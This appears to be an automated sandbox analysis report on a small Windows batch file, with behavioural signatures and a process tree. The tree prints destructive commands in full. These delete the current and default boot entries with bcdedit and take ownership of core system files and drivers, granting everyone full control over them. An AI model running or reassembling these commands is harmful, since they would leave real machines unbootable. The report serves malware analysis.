e9a9a4471cb3d208fe8def7195b2ea9786b542f0a0aadbc361d6c4aed542a315

Analysis

max time kernel
60s
max time network
17s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
06/07/2024, 12:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Textdokument (neu) - Kopie.bat
Size

2KB
MD5

058f7e23884150b30d73e03a31753b0e
SHA1

9c88226489508c83218ed4b459601dad35440e46
SHA256

e9a9a4471cb3d208fe8def7195b2ea9786b542f0a0aadbc361d6c4aed542a315
SHA512

50c64840c0aa4fdb19d759a78293340b92ef11d3f002d2b70ad8704f0ba885c32cb7d932b93a28b9233693a46024e2a0a5ac1f2714ccdce626e7c43a6bcc6406

Score

8^/10

discovery exploit

Malware Config

Signatures

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
2304	Process not Found
1252	takeown.exe
2196	Process not Found
2576	Process not Found
1484	takeown.exe
1408	takeown.exe
2972	icacls.exe
2192	icacls.exe
2764	icacls.exe
2860	icacls.exe
2708	icacls.exe
2144	icacls.exe
2588	takeown.exe
2124	Process not Found
2640	icacls.exe
2192	takeown.exe
1156	Process not Found
1436	Process not Found
2088	Process not Found
2472	icacls.exe
804	takeown.exe
2160	Process not Found
2920	takeown.exe
1072	Process not Found
1484	Process not Found
1568	Process not Found
2028	Process not Found
1608	Process not Found
2056	icacls.exe
2400	takeown.exe
1088	icacls.exe
2924	Process not Found
2052	Process not Found
2908	Process not Found
2172	Process not Found
1696	Process not Found
1904	icacls.exe
2972	takeown.exe
1960	Process not Found
2908	Process not Found
2888	Process not Found
2588	takeown.exe
2724	icacls.exe
1984	takeown.exe
1680	icacls.exe
2756	icacls.exe
856	Process not Found
2936	Process not Found
2684	takeown.exe
1884	takeown.exe
840	Process not Found
2968	takeown.exe
1812	Process not Found
2820	icacls.exe
2136	takeown.exe
2872	icacls.exe
2784	Process not Found
1048	takeown.exe
2188	takeown.exe
2116	takeown.exe
2884	Process not Found
3016	Process not Found
3000	Process not Found
2944	Process not Found

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2232	Process not Found
2980	Process not Found
2412	Process not Found
2672	takeown.exe
2932	icacls.exe
1940	takeown.exe
2772	takeown.exe
2156	Process not Found
2536	Process not Found
2548	Process not Found
2940	Process not Found
704	takeown.exe
832	takeown.exe
2876	icacls.exe
2168	Process not Found
2684	Process not Found
1480	icacls.exe
1732	Process not Found
2332	Process not Found
2472	icacls.exe
2188	takeown.exe
1636	Process not Found
1500	Process not Found
2868	Process not Found
1952	Process not Found
1984	Process not Found
1596	Process not Found
1596	takeown.exe
2688	Process not Found
2496	Process not Found
2140	Process not Found
944	Process not Found
2336	icacls.exe
1976	icacls.exe
2908	icacls.exe
2116	takeown.exe
1976	takeown.exe
2112	takeown.exe
2740	icacls.exe
1456	Process not Found
2592	Process not Found
840	Process not Found
2648	icacls.exe
2368	icacls.exe
1048	takeown.exe
2856	Process not Found
2940	Process not Found
1596	takeown.exe
2828	Process not Found
1812	Process not Found
2900	Process not Found
944	Process not Found
1564	Process not Found
2556	takeown.exe
1996	icacls.exe
3048	takeown.exe
2512	Process not Found
1896	Process not Found
2948	Process not Found
856	Process not Found
2068	takeown.exe
864	icacls.exe
2004	icacls.exe
1484	Process not Found

Modifies boot configuration data using bcdedit 64 IoCs

pid	Process
1276	bcdedit.exe
2068	bcdedit.exe
1372	bcdedit.exe
1984	bcdedit.exe
3032	bcdedit.exe
2100	bcdedit.exe
2116	bcdedit.exe
2108	bcdedit.exe
832	bcdedit.exe
572	bcdedit.exe
2236	bcdedit.exe
2928	bcdedit.exe
2460	bcdedit.exe
3048	bcdedit.exe
2648	bcdedit.exe
1940	bcdedit.exe
2188	bcdedit.exe
2076	bcdedit.exe
888	bcdedit.exe
2024	bcdedit.exe
2616	bcdedit.exe
1864	bcdedit.exe
2468	bcdedit.exe
2200	bcdedit.exe
1936	bcdedit.exe
1752	bcdedit.exe
2988	bcdedit.exe
2628	bcdedit.exe
2180	bcdedit.exe
2972	bcdedit.exe
864	bcdedit.exe
844	bcdedit.exe
2640	bcdedit.exe
2780	bcdedit.exe
2232	bcdedit.exe
2856	bcdedit.exe
1992	bcdedit.exe
1988	bcdedit.exe
2368	bcdedit.exe
2996	bcdedit.exe
3068	bcdedit.exe
1928	bcdedit.exe
2332	bcdedit.exe
2392	bcdedit.exe
2472	bcdedit.exe
2724	bcdedit.exe
2704	bcdedit.exe
2848	bcdedit.exe
780	bcdedit.exe
2496	bcdedit.exe
2892	Process not Found
2740	Process not Found
2948	Process not Found
2944	Process not Found
2584	Process not Found
1664	Process not Found
2612	Process not Found
2732	Process not Found
2952	Process not Found
1960	Process not Found
2028	Process not Found
2212	Process not Found
2712	Process not Found
2888	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2064	takeown.exe
Token: SeTakeOwnershipPrivilege	2400	takeown.exe
Token: SeTakeOwnershipPrivilege	2420	takeown.exe
Token: SeTakeOwnershipPrivilege	2556	takeown.exe
Token: SeTakeOwnershipPrivilege	2548	takeown.exe
Token: SeTakeOwnershipPrivilege	2540	takeown.exe
Token: SeTakeOwnershipPrivilege	2576	takeown.exe
Token: SeTakeOwnershipPrivilege	2112	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	2936	takeown.exe
Token: SeTakeOwnershipPrivilege	2672	takeown.exe
Token: SeTakeOwnershipPrivilege	2844	takeown.exe
Token: SeTakeOwnershipPrivilege	268	takeown.exe
Token: SeTakeOwnershipPrivilege	1216	takeown.exe
Token: SeTakeOwnershipPrivilege	2440	takeown.exe
Token: SeTakeOwnershipPrivilege	1892	takeown.exe
Token: SeTakeOwnershipPrivilege	1408	takeown.exe
Token: SeTakeOwnershipPrivilege	1384	takeown.exe
Token: SeTakeOwnershipPrivilege	1636	takeown.exe
Token: SeTakeOwnershipPrivilege	1952	takeown.exe
Token: SeTakeOwnershipPrivilege	2588	takeown.exe
Token: SeTakeOwnershipPrivilege	2808	takeown.exe
Token: SeTakeOwnershipPrivilege	704	takeown.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeTakeOwnershipPrivilege	1252	takeown.exe
Token: SeTakeOwnershipPrivilege	896	takeown.exe
Token: SeTakeOwnershipPrivilege	1812	takeown.exe
Token: SeTakeOwnershipPrivilege	1640	takeown.exe
Token: SeTakeOwnershipPrivilege	1324	takeown.exe
Token: SeTakeOwnershipPrivilege	1708	takeown.exe
Token: SeTakeOwnershipPrivilege	1560	takeown.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeTakeOwnershipPrivilege	2072	takeown.exe
Token: SeTakeOwnershipPrivilege	2568	takeown.exe
Token: SeTakeOwnershipPrivilege	2412	takeown.exe
Token: SeTakeOwnershipPrivilege	2396	takeown.exe
Token: SeTakeOwnershipPrivilege	2416	takeown.exe
Token: SeTakeOwnershipPrivilege	308	takeown.exe
Token: SeTakeOwnershipPrivilege	2536	takeown.exe
Token: SeTakeOwnershipPrivilege	1272	takeown.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: SeTakeOwnershipPrivilege	1372	takeown.exe
Token: SeTakeOwnershipPrivilege	652	takeown.exe
Token: SeTakeOwnershipPrivilege	2148	takeown.exe
Token: SeTakeOwnershipPrivilege	2852	takeown.exe
Token: SeTakeOwnershipPrivilege	2140	takeown.exe
Token: SeTakeOwnershipPrivilege	2432	takeown.exe
Token: SeTakeOwnershipPrivilege	1456	takeown.exe
Token: SeTakeOwnershipPrivilege	2240	takeown.exe
Token: SeTakeOwnershipPrivilege	1656	takeown.exe
Token: SeTakeOwnershipPrivilege	444	takeown.exe
Token: SeTakeOwnershipPrivilege	3040	takeown.exe
Token: SeTakeOwnershipPrivilege	2100	takeown.exe
Token: SeTakeOwnershipPrivilege	2588	takeown.exe
Token: SeTakeOwnershipPrivilege	2808	takeown.exe
Token: SeTakeOwnershipPrivilege	704	takeown.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeTakeOwnershipPrivilege	1252	takeown.exe
Token: SeTakeOwnershipPrivilege	2248	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeTakeOwnershipPrivilege	1600	takeown.exe
Token: SeTakeOwnershipPrivilege	3060	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2516 wrote to memory of 1276	2516	cmd.exe	31
PID 2516 wrote to memory of 1276	2516	cmd.exe	31
PID 2516 wrote to memory of 1276	2516	cmd.exe	31
PID 2516 wrote to memory of 2068	2516	cmd.exe	32
PID 2516 wrote to memory of 2068	2516	cmd.exe	32
PID 2516 wrote to memory of 2068	2516	cmd.exe	32
PID 2516 wrote to memory of 2064	2516	cmd.exe	33
PID 2516 wrote to memory of 2064	2516	cmd.exe	33
PID 2516 wrote to memory of 2064	2516	cmd.exe	33
PID 2516 wrote to memory of 2400	2516	cmd.exe	34
PID 2516 wrote to memory of 2400	2516	cmd.exe	34
PID 2516 wrote to memory of 2400	2516	cmd.exe	34
PID 2516 wrote to memory of 2420	2516	cmd.exe	35
PID 2516 wrote to memory of 2420	2516	cmd.exe	35
PID 2516 wrote to memory of 2420	2516	cmd.exe	35
PID 2516 wrote to memory of 2556	2516	cmd.exe	36
PID 2516 wrote to memory of 2556	2516	cmd.exe	36
PID 2516 wrote to memory of 2556	2516	cmd.exe	36
PID 2516 wrote to memory of 2548	2516	cmd.exe	37
PID 2516 wrote to memory of 2548	2516	cmd.exe	37
PID 2516 wrote to memory of 2548	2516	cmd.exe	37
PID 2516 wrote to memory of 2540	2516	cmd.exe	38
PID 2516 wrote to memory of 2540	2516	cmd.exe	38
PID 2516 wrote to memory of 2540	2516	cmd.exe	38
PID 2516 wrote to memory of 2576	2516	cmd.exe	39
PID 2516 wrote to memory of 2576	2516	cmd.exe	39
PID 2516 wrote to memory of 2576	2516	cmd.exe	39
PID 2516 wrote to memory of 2112	2516	cmd.exe	40
PID 2516 wrote to memory of 2112	2516	cmd.exe	40
PID 2516 wrote to memory of 2112	2516	cmd.exe	40
PID 2516 wrote to memory of 2684	2516	cmd.exe	41
PID 2516 wrote to memory of 2684	2516	cmd.exe	41
PID 2516 wrote to memory of 2684	2516	cmd.exe	41
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 2936	2516	cmd.exe	42
PID 2516 wrote to memory of 280	2516	cmd.exe	43
PID 2516 wrote to memory of 280	2516	cmd.exe	43
PID 2516 wrote to memory of 280	2516	cmd.exe	43
PID 2516 wrote to memory of 2172	2516	cmd.exe	44
PID 2516 wrote to memory of 2172	2516	cmd.exe	44
PID 2516 wrote to memory of 2172	2516	cmd.exe	44
PID 2516 wrote to memory of 2088	2516	cmd.exe	45
PID 2516 wrote to memory of 2088	2516	cmd.exe	45
PID 2516 wrote to memory of 2088	2516	cmd.exe	45
PID 2516 wrote to memory of 580	2516	cmd.exe	46
PID 2516 wrote to memory of 580	2516	cmd.exe	46
PID 2516 wrote to memory of 580	2516	cmd.exe	46
PID 2516 wrote to memory of 2080	2516	cmd.exe	47
PID 2516 wrote to memory of 2080	2516	cmd.exe	47
PID 2516 wrote to memory of 2080	2516	cmd.exe	47
PID 2516 wrote to memory of 2748	2516	cmd.exe	48
PID 2516 wrote to memory of 2748	2516	cmd.exe	48
PID 2516 wrote to memory of 2748	2516	cmd.exe	48
PID 2516 wrote to memory of 2712	2516	cmd.exe	49
PID 2516 wrote to memory of 2712	2516	cmd.exe	49
PID 2516 wrote to memory of 2712	2516	cmd.exe	49
PID 2516 wrote to memory of 2804	2516	cmd.exe	50
PID 2516 wrote to memory of 2804	2516	cmd.exe	50
PID 2516 wrote to memory of 2804	2516	cmd.exe	50
PID 2516 wrote to memory of 2812	2516	cmd.exe	51
PID 2516 wrote to memory of 2812	2516	cmd.exe	51
PID 2516 wrote to memory of 2812	2516	cmd.exe	51
PID 2516 wrote to memory of 2876	2516	cmd.exe	52

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Textdokument (neu) - Kopie.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2516
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1276
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2068
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2064
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2548
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2112
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:280
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2088
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2080
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2712
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2812
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2900
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2732
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2932
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2472
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2904
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2920
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2632
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2884
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1632
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2772
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2648
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1932
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:572
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:1480
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1816
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:1140
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1372
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1984
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:268
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1892
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1604
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1624
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1568
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2168
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1860
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1508
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2000
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2952
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2864
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2856
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2972
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2700
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2468
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:588
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2076
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2204
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2236
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2976
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2216
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:804
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2276
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3032
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2100
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:704
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1732
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1672
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1948
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2980
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1664
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1364
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:780
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2304
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2496
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2692
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2144
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2336
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:1484
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:304
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:844
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2244
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1740
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:1996
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:1972
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2056
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2248
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2116
